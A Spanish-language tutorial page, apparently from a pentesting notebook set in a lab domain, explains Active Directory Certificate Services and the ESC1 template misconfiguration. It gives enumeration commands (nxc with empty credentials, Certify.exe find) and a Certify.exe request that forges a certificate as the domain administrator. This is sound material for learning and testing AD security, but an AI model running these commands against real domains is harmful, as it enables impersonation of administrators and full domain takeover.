ADCS es el rol de servicios de certificación de Microsoft que permite emitir, administrar y validar certificados digitales dentro de una infraestructura Windows.
Enterprise CA
Autoridad de certificación integrada con Active Directory
Certificate Templates
Plantillas que definen qué permisos, usos y configuraciones tienen los certificados emitidos
Enrollment
Proceso por el cual un usuario o máquina solicita un certificado
PKINIT
Autenticación Kerberos mediante certificado (en lugar de hash o password)
Flujo común de emisión de certificados:
El usuario o sistema solicita un certificado a la CA.
La CA valida si puede emitir ese certificado (según la plantilla).
Si todo es correcto, emite un certificado firmado digitalmente.
Ese certificado puede ser usado como mecanismo de autenticación.
La lógica de emisión puede estar mal configurada, permitiendo:
Que usuarios normales generen certificados que impersonan a otros usuarios (como Domain Admin)
Que cualquier máquina pueda pedir certificados para autenticarse como otra
Que un atacante persista generando certificados válidos incluso después de un reseteo de contraseñas
# Discover ADCS servers in the environment
nxc ldap 192.168.56.10-23 -u '' -p '' -M adcsCuando todas estas condiciones se cumplen, se puede solicitar un certificado para cualquier usuario del dominio:
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT habilitada.
Autenticación del Cliente o Cualquier Propósito EKU (pkiextendedkeyusage = Client Authentication).
Usuarios de Dominio con permisos de inscripción.
Sin aprobación del manager requerido.
Identificación de plantillas vulnerables:
Solicitud de certificado en nombre del administrador:
Última actualización
Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubjectCertify.exe request /ca:braavos.essos.local\ESSOS-CA /template:ESC1 /altname:essos\administrator /sid:S-1-5-21-1394808576-3393508183-1134699666-500